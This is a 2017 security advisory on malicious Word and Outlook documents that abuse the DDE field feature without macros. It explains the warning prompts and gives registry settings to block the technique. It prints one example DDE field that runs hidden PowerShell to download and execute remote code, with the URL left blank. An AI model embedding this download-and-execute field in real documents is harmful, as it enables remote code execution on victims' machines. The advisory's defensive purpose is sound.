CSP-CERT® Security Advisory:
New Attack in Word and Outlook, No Need for Macros

by CSP-CERT® Research Science
posted October 2017

New Attack in Word and Outlook, No Need for Macros



There is a new attack of malicious documents going around in the wild these days.

The new attack comes in the form of malicious documents that abuses the DDE feature of MS Word (.docx files) to automatically executes.

The Bad:

This attack does not need macros to execute unlike previous iterations of malicious documents. All the attacker needs to do is modify a DDE formula field and put the malicious code inside.

Example:

DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://');powershell -e $e "

The code above will call PowerShell which in turn will download and execute whatever is provided on the URL link.

Most of the attacks we have seen are iterations of the code above. What’s worse is that because of the nature of DDE, this attack does not only work on MS Word documents, but it can be used on an email’s body itself, thus removing the attachment all together from the equation.

Reports have also come in that it can be used with OneNote and Calendar Invites on Outlook.

Because it is not exactly a vulnerability, but a feature that is being abused (like Macros), there does not seem to be a patch coming in the foreseeable future.

The Good:

Some good news, because of how the attack is structured, there’s a warning sign, two in fact, that can serve as red flags for the security conscious. This comes in the way of message boxes that should raise alarms for the user.

Upon opening a document or an email with this kind of attack, the message box below will pop up.


If you click yes, it will continue to load and will then show the pop up below


If the first message box didn’t trip any warning bells, the second should!

If the user clicks yes on this, then it will continue and execute the malicious code.

Clicking NO on any of the message boxes that pop up will stop the threat on its tracks.

Furthermore, it is advisable to create these registry entries to stop this avenue of attack altogether. The registries below will make it so that the user won’t even get a message box, it just says no right from the start and the attack will not work.

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]

"DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\WordMail]

"DontUpdateLinks"=dword:00000001

The GitHub link below covers more versions of Office


This can then be packaged as a GPO on a domain environment and then spread across the enterprise.